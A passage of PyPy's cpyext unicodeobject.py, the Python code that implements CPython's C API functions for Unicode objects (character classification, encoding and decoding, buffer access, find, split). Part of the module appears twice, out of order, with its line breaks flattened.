alphanumeric character.""" return unicodedb.isalnum(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLINEBREAK(space, ch): """Return 1 or 0 depending on whether ch is a linebreak character.""" return unicodedb.islinebreak(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDECIMAL(space, ch): """Return 1 or 0 depending on whether ch is a decimal character.""" return unicodedb.isdecimal(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDIGIT(space, ch): """Return 1 or 0 depending on whether ch is a digit character.""" return unicodedb.isdigit(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISNUMERIC(space, ch): """Return 1 or 0 depending on whether ch is a numeric character.""" return unicodedb.isnumeric(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLOWER(space, ch): """Return 1 or 0 depending on whether ch is a lowercase character.""" return unicodedb.islower(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISUPPER(space, ch): """Return 1 or 0 depending on whether ch is an uppercase character.""" return unicodedb.isupper(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISTITLE(space, ch): """Return 1 or 0 depending on whether ch is a titlecase character.""" return unicodedb.istitle(ord(ch)) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOLOWER(space, ch): """Return the character ch converted to lower case.""" return unichr(unicodedb.tolower(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOUPPER(space, ch): """Return the character ch converted to upper case.""" return unichr(unicodedb.toupper(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOTITLE(space, ch): """Return the character ch converted to title case.""" return unichr(unicodedb.totitle(ord(ch))) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODECIMAL(space, ch): """Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.decimal(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODIGIT(space, ch): """Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.digit(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.DOUBLE, error=CANNOT_FAIL) def Py_UNICODE_TONUMERIC(space, ch): """Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.numeric(ord(ch)) except KeyError: return -1.0 @cpython_api([], Py_UNICODE, error=CANNOT_FAIL) def PyUnicode_GetMax(space): """Get the maximum ordinal for a Unicode character.""" return runicode.UNICHR(runicode.MAXUNICODE) @cpython_api([PyObject], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_AS_DATA(space, ref): """Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked).""" return rffi.cast(rffi.CCHARP, PyUnicode_AS_UNICODE(space, ref)) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_DATA_SIZE(space, w_obj): """Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked).""" return rffi.sizeof(lltype.UniChar) * PyUnicode_GET_SIZE(space, w_obj) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_SIZE(space, w_obj): """Return the size of the object. o has to be a PyUnicodeObject (not checked).""" assert isinstance(w_obj, unicodeobject.W_UnicodeObject) return space.len_w(w_obj) @cpython_api([PyObject], rffi.CWCHARP, error=CANNOT_FAIL) def PyUnicode_AS_UNICODE(space, ref): """Return a pointer to the internal Py_UNICODE buffer of the object. ref has to be a PyUnicodeObject (not checked).""" ref_unicode = rffi.cast(PyUnicodeObject, ref) if not ref_unicode.c_buffer: # Copy unicode buffer w_unicode = from_ref(space, ref) u = space.unicode_w(w_unicode) ref_unicode.c_buffer = rffi.unicode2wcharp(u) return ref_unicode.c_buffer @cpython_api([PyObject], rffi.CWCHARP) def PyUnicode_AsUnicode(space, ref): """Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object.""" # Don't use PyUnicode_Check, it will realize the object :-( w_type = from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) if not space.is_true(space.issubtype(w_type, space.w_unicode)): raise OperationError(space.w_TypeError, space.wrap("expected unicode object")) return PyUnicode_AS_UNICODE(space, ref) @cpython_api([PyObject], Py_ssize_t, error=-1) def PyUnicode_GetSize(space, ref): if from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) is space.w_unicode: ref = rffi.cast(PyUnicodeObject, ref) return ref.c_size else: w_obj = from_ref(space, ref) return space.len_w(w_obj) @cpython_api([PyUnicodeObject, rffi.CWCHARP, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_AsWideChar(space, ref, buf, size): """Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application.""" c_buffer = PyUnicode_AS_UNICODE(space, rffi.cast(PyObject, ref)) c_size = ref.c_size # If possible, try to copy the 0-termination as well if size > c_size: size = c_size + 1 i = 0 while i < size: buf[i] = c_buffer[i] i += 1 if size > c_size: return c_size else: return size @cpython_api([], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_GetDefaultEncoding(space): """Returns the currently active default encoding.""" if default_encoding[0] == '\x00': encoding = unicodetype.getdefaultencoding(space) i = 0 while i < len(encoding) and i < DEFAULT_ENCODING_SIZE: default_encoding[i] = encoding[i] i += 1 return default_encoding @cpython_api([CONST_STRING], rffi.INT_real, error=-1) def PyUnicode_SetDefaultEncoding(space, encoding): """Sets the currently active default encoding. Returns 0 on success, -1 in case of an error.""" w_encoding = space.wrap(rffi.charp2str(encoding)) setdefaultencoding(space, w_encoding) default_encoding[0] = '\x00' return 0 @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) encoding = errors = None if llencoding: encoding = rffi.charp2str(llencoding) if llerrors: errors = rffi.charp2str(llerrors) return unicodetype.encode_object(space, w_unicode, encoding, errors) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedString(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python string object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors) if not PyString_Check(space, w_str): raise OperationError(space.w_TypeError, space.wrap( "encoder did not return a string object")) return w_str @cpython_api([PyObject], PyObject) def PyUnicode_AsUnicodeEscapeString(space, w_unicode): """Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, 'unicode-escape', 'strict') @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromUnicode(space, wchar_p, length): """Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if wchar_p: s = rffi.wcharpsize2unicode(wchar_p, length) return make_ref(space, space.wrap(s)) else: return rffi.cast(PyObject, new_empty_unicode(space, length)) @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromWideChar(space, wchar_p, length): """Create a Unicode object from the wchar_t buffer w of the given size. Return NULL on failure.""" # PyPy supposes Py_UNICODE == wchar_t return PyUnicode_FromUnicode(space, wchar_p, length) @cpython_api([PyObject, CONST_STRING], PyObject) def _PyUnicode_AsDefaultEncodedString(space, w_unicode, errors): return PyUnicode_AsEncodedString(space, w_unicode, lltype.nullptr(rffi.CCHARP.TO), errors) @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_Decode(space, s, size, encoding, errors): """Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = space.wrap(rffi.charpsize2str(s, size)) w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_str, 'decode', w_encoding, w_errors) @cpython_api([PyObject], PyObject) def PyUnicode_FromObject(space, w_obj): """Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed.""" if space.is_w(space.type(w_obj), space.w_unicode): return w_obj else: return space.call_function(space.w_unicode, w_obj) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_FromEncodedObject(space, w_obj, encoding, errors): """Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). All other objects, including Unicode objects, cause a TypeError to be set.""" w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None # - unicode is disallowed # - raise TypeError for non-string types if space.is_true(space.isinstance(w_obj, space.w_unicode)): w_meth = None else: try: w_meth = space.getattr(w_obj, space.wrap('decode')) except OperationError, e: if not e.match(space, space.w_AttributeError): raise w_meth = None if w_meth is None: raise OperationError(space.w_TypeError, space.wrap("decoding Unicode is not supported")) return space.call_function(w_meth, w_encoding, w_errors) @cpython_api([CONST_STRING], PyObject) def PyUnicode_FromString(space, s): """Create a Unicode object from an UTF-8 encoded null-terminated char buffer""" w_str = space.wrap(rffi.charp2str(s)) return space.call_method(w_str, 'decode', space.wrap("utf-8")) @cpython_api([CONST_STRING, Py_ssize_t], PyObject) def PyUnicode_FromStringAndSize(space, s, size): """Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if s: return make_ref(space, PyUnicode_DecodeUTF8( space, s, size, lltype.nullptr(rffi.CCHARP.TO))) else: return rffi.cast(PyObject, new_empty_unicode(space, size)) @cpython_api([rffi.INT_real], PyObject) def PyUnicode_FromOrdinal(space, ordinal): """Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). A ValueError is raised in case it is not.""" w_ordinal = space.wrap(rffi.cast(lltype.Signed, ordinal)) return space.call_function(space.builtin.get('unichr'), w_ordinal) @cpython_api([PyObjectP, Py_ssize_t], rffi.INT_real, error=-1) def PyUnicode_Resize(space, ref, newsize): # XXX always create a new string so far py_uni = rffi.cast(PyUnicodeObject, ref[0]) if not py_uni.c_buffer: raise OperationError(space.w_SystemError, space.wrap( "PyUnicode_Resize called on already created string")) try: py_newuni = new_empty_unicode(space, newsize) except MemoryError: Py_DecRef(space, ref[0]) ref[0] = lltype.nullptr(PyObject.TO) raise to_cp = newsize oldsize = py_uni.c_size if oldsize < newsize: to_cp = oldsize for i in range(to_cp): py_newuni.c_buffer[i] = py_uni.c_buffer[i] Py_DecRef(space, ref[0]) ref[0] = rffi.cast(PyObject, py_newuni) return 0 def make_conversion_functions(suffix, encoding): @cpython_api([PyObject], PyObject) @func_renamer('PyUnicode_As%sString' % suffix) def PyUnicode_AsXXXString(space, w_unicode): """Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, encoding, "strict") @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Decode%s' % suffix) def PyUnicode_DecodeXXX(space, s, size, errors): """Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. """ w_s = space.wrap(rffi.charpsize2str(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_s, 'decode', space.wrap(encoding), w_errors) globals()['PyUnicode_Decode%s' % suffix] = PyUnicode_DecodeXXX @cpython_api([CONST_WSTRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Encode%s' % suffix) def PyUnicode_EncodeXXX(space, s, size, errors): """Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec.""" w_u = space.wrap(rffi.wcharpsize2unicode(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_u, 'encode', space.wrap(encoding), w_errors) globals()['PyUnicode_Encode%s' % suffix] = PyUnicode_EncodeXXX make_conversion_functions('UTF8', 'utf-8') make_conversion_functions('ASCII', 'ascii') make_conversion_functions('Latin1', 'latin-1') if sys.platform == 'win32': make_conversion_functions('MBCS', 'mbcs') @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF16(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec.""" string = rffi.charpsize2str(s, size) if pbyteorder is not None: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_16_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF32(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. """ string = rffi.charpsize2str(s, size) if pbyteorder: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_32_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([PyObject, PyObject], rffi.INT_real, error=-2) def PyUnicode_Compare(space, w_left, w_right): """Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively.""" return space.int_w(space.cmp(w_left, w_right)) @cpython_api([rffi.CWCHARP, rffi.CWCHARP, Py_ssize_t], lltype.Void) def Py_UNICODE_COPY(space, target, source, length): """Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target""" for i in range(0, length): target[i] = source[i] @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Format(space, w_format, w_args): """Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple.""" return space.mod(w_format, w_args) @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Join(space, w_sep, w_seq): """Join a sequence of strings using the given separator and return the resulting Unicode string.""" return space.call_method(w_sep, 'join', w_seq) @cpython_api([PyObject, PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Replace(space, w_str, w_substr, w_replstr, maxcount): """Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. maxcount == -1 means replace all occurrences.""" return space.call_method(w_str, "replace", w_substr, w_replstr, space.wrap(maxcount)) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], rffi.INT_real, error=-1) def PyUnicode_Tailmatch(space, w_str, w_substr, start, end, direction): """Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred.""" str = space.unicode_w(w_str) substr = space.unicode_w(w_substr) if rffi.cast(lltype.Signed, direction) <= 0: return stringtype.stringstartswith(str, substr, start, end) else: return stringtype.stringendswith(str, substr, start, end) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_Count(space, w_str, w_substr, start, end): """Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred.""" w_count = space.call_method(w_str, "count", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_count) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], Py_ssize_t, error=-2) def PyUnicode_Find(space, w_str, w_substr, start, end, direction): """Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set.""" if rffi.cast(lltype.Signed, direction) > 0: w_pos = space.call_method(w_str, "find", w_substr, space.wrap(start), space.wrap(end)) else: w_pos = space.call_method(w_str, "rfind", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_pos) @cpython_api([PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Split(space, w_str, w_sep, maxsplit): """Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list.""" if w_sep is None: w_sep = space.w_None return space.call_method(w_str, "split", w_sep, space.wrap(maxsplit)) @cpython_api([PyObject, rffi.INT_real], PyObject) def PyUnicode_Splitlines(space, w_str, keepend): """Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.""" return space.call_method(w_str, "splitlines", space.wrap(keepend))
from pypy.interpreter.error import OperationError from pypy.rpython.lltypesystem import rffi, lltype from pypy.rpython.lltypesystem import llmemory from pypy.module.unicodedata import unicodedb from pypy.module.cpyext.api import ( CANNOT_FAIL, Py_ssize_t, build_type_checkers, cpython_api, bootstrap_function, PyObjectFields, cpython_struct, CONST_STRING, CONST_WSTRING) from pypy.module.cpyext.pyerrors import PyErr_BadArgument from pypy.module.cpyext.pyobject import ( PyObject, PyObjectP, Py_DecRef, make_ref, from_ref, track_reference, make_typedescr, get_typedescr) from pypy.module.cpyext.stringobject import PyString_Check from pypy.module.sys.interp_encoding import setdefaultencoding from pypy.objspace.std import unicodeobject, unicodetype, stringtype from pypy.rlib import runicode from pypy.tool.sourcetools import func_renamer import sys ## See comment in stringobject.py. PyUnicodeObjectStruct = lltype.ForwardReference() PyUnicodeObject = lltype.Ptr(PyUnicodeObjectStruct) PyUnicodeObjectFields = (PyObjectFields + (("buffer", rffi.CWCHARP), ("size", Py_ssize_t))) cpython_struct("PyUnicodeObject", PyUnicodeObjectFields, PyUnicodeObjectStruct) @bootstrap_function def init_unicodeobject(space): make_typedescr(space.w_unicode.instancetypedef, basestruct=PyUnicodeObject.TO, attach=unicode_attach, dealloc=unicode_dealloc, realize=unicode_realize) # Buffer for the default encoding (used by PyUnicde_GetDefaultEncoding) DEFAULT_ENCODING_SIZE = 100 default_encoding = lltype.malloc(rffi.CCHARP.TO, DEFAULT_ENCODING_SIZE, flavor='raw', zero=True) PyUnicode_Check, PyUnicode_CheckExact = build_type_checkers("Unicode", "w_unicode") Py_UNICODE = lltype.UniChar def new_empty_unicode(space, length): """ Allocatse a PyUnicodeObject and its buffer, but without a corresponding interpreter object. The buffer may be mutated, until unicode_realize() is called. """ typedescr = get_typedescr(space.w_unicode.instancetypedef) py_obj = typedescr.allocate(space, space.w_unicode) py_uni = rffi.cast(PyUnicodeObject, py_obj) buflen = length + 1 py_uni.c_size = length py_uni.c_buffer = lltype.malloc(rffi.CWCHARP.TO, buflen, flavor='raw', zero=True) return py_uni def unicode_attach(space, py_obj, w_obj): "Fills a newly allocated PyUnicodeObject with a unicode string" py_unicode = rffi.cast(PyUnicodeObject, py_obj) py_unicode.c_size = len(space.unicode_w(w_obj)) py_unicode.c_buffer = lltype.nullptr(rffi.CWCHARP.TO) def unicode_realize(space, py_obj): """ Creates the unicode in the interpreter. The PyUnicodeObject buffer must not be modified after this call. """ py_uni = rffi.cast(PyUnicodeObject, py_obj) s = rffi.wcharpsize2unicode(py_uni.c_buffer, py_uni.c_size) w_obj = space.wrap(s) track_reference(space, py_obj, w_obj) return w_obj @cpython_api([PyObject], lltype.Void, external=False) def unicode_dealloc(space, py_obj): py_unicode = rffi.cast(PyUnicodeObject, py_obj) if py_unicode.c_buffer: lltype.free(py_unicode.c_buffer, flavor="raw") from pypy.module.cpyext.object import PyObject_dealloc PyObject_dealloc(space, py_obj) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISSPACE(space, ch): """Return 1 or 0 depending on whether ch is a whitespace character.""" return unicodedb.isspace(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALPHA(space, ch): """Return 1 or 0 depending on whether ch is an alphabetic character.""" return unicodedb.isalpha(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALNUM(space, ch): """Return 1 or 0 depending on whether ch is an alphanumeric character.""" return unicodedb.isalnum(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLINEBREAK(space, ch): """Return 1 or 0 depending on whether ch is a linebreak character.""" return unicodedb.islinebreak(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDECIMAL(space, ch): """Return 1 or 0 depending on whether ch is a decimal character.""" return unicodedb.isdecimal(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDIGIT(space, ch): """Return 1 or 0 depending on whether ch is a digit character.""" return unicodedb.isdigit(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISNUMERIC(space, ch): """Return 1 or 0 depending on whether ch is a numeric character.""" return unicodedb.isnumeric(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLOWER(space, ch): """Return 1 or 0 depending on whether ch is a lowercase character.""" return unicodedb.islower(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISUPPER(space, ch): """Return 1 or 0 depending on whether ch is an uppercase character.""" return unicodedb.isupper(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISTITLE(space, ch): """Return 1 or 0 depending on whether ch is a titlecase character.""" return unicodedb.istitle(ord(ch)) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOLOWER(space, ch): """Return the character ch converted to lower case.""" return unichr(unicodedb.tolower(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOUPPER(space, ch): """Return the character ch converted to upper case.""" return unichr(unicodedb.toupper(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOTITLE(space, ch): """Return the character ch converted to title case.""" return unichr(unicodedb.totitle(ord(ch))) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODECIMAL(space, ch): """Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.decimal(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODIGIT(space, ch): """Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.digit(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.DOUBLE, error=CANNOT_FAIL) def Py_UNICODE_TONUMERIC(space, ch): """Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.numeric(ord(ch)) except KeyError: return -1.0 @cpython_api([], Py_UNICODE, error=CANNOT_FAIL) def PyUnicode_GetMax(space): """Get the maximum ordinal for a Unicode character.""" return runicode.UNICHR(runicode.MAXUNICODE) @cpython_api([PyObject], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_AS_DATA(space, ref): """Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked).""" return rffi.cast(rffi.CCHARP, PyUnicode_AS_UNICODE(space, ref)) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_DATA_SIZE(space, w_obj): """Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked).""" return rffi.sizeof(lltype.UniChar) * PyUnicode_GET_SIZE(space, w_obj) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_SIZE(space, w_obj): """Return the size of the object. o has to be a PyUnicodeObject (not checked).""" assert isinstance(w_obj, unicodeobject.W_UnicodeObject) return space.len_w(w_obj) @cpython_api([PyObject], rffi.CWCHARP, error=CANNOT_FAIL) def PyUnicode_AS_UNICODE(space, ref): """Return a pointer to the internal Py_UNICODE buffer of the object. ref has to be a PyUnicodeObject (not checked).""" ref_unicode = rffi.cast(PyUnicodeObject, ref) if not ref_unicode.c_buffer: # Copy unicode buffer w_unicode = from_ref(space, ref) u = space.unicode_w(w_unicode) ref_unicode.c_buffer = rffi.unicode2wcharp(u) return ref_unicode.c_buffer @cpython_api([PyObject], rffi.CWCHARP) def PyUnicode_AsUnicode(space, ref): """Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object.""" # Don't use PyUnicode_Check, it will realize the object :-( w_type = from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) if not space.is_true(space.issubtype(w_type, space.w_unicode)): raise OperationError(space.w_TypeError, space.wrap("expected unicode object")) return PyUnicode_AS_UNICODE(space, ref) @cpython_api([PyObject], Py_ssize_t, error=-1) def PyUnicode_GetSize(space, ref): if from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) is space.w_unicode: ref = rffi.cast(PyUnicodeObject, ref) return ref.c_size else: w_obj = from_ref(space, ref) return space.len_w(w_obj) @cpython_api([PyUnicodeObject, rffi.CWCHARP, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_AsWideChar(space, ref, buf, size): """Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application.""" c_buffer = PyUnicode_AS_UNICODE(space, rffi.cast(PyObject, ref)) c_size = ref.c_size # If possible, try to copy the 0-termination as well if size > c_size: size = c_size + 1 i = 0 while i < size: buf[i] = c_buffer[i] i += 1 if size > c_size: return c_size else: return size @cpython_api([], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_GetDefaultEncoding(space): """Returns the currently active default encoding.""" if default_encoding[0] == '\x00': encoding = unicodetype.getdefaultencoding(space) i = 0 while i < len(encoding) and i < DEFAULT_ENCODING_SIZE: default_encoding[i] = encoding[i] i += 1 return default_encoding @cpython_api([CONST_STRING], rffi.INT_real, error=-1) def PyUnicode_SetDefaultEncoding(space, encoding): """Sets the currently active default encoding. Returns 0 on success, -1 in case of an error.""" w_encoding = space.wrap(rffi.charp2str(encoding)) setdefaultencoding(space, w_encoding) 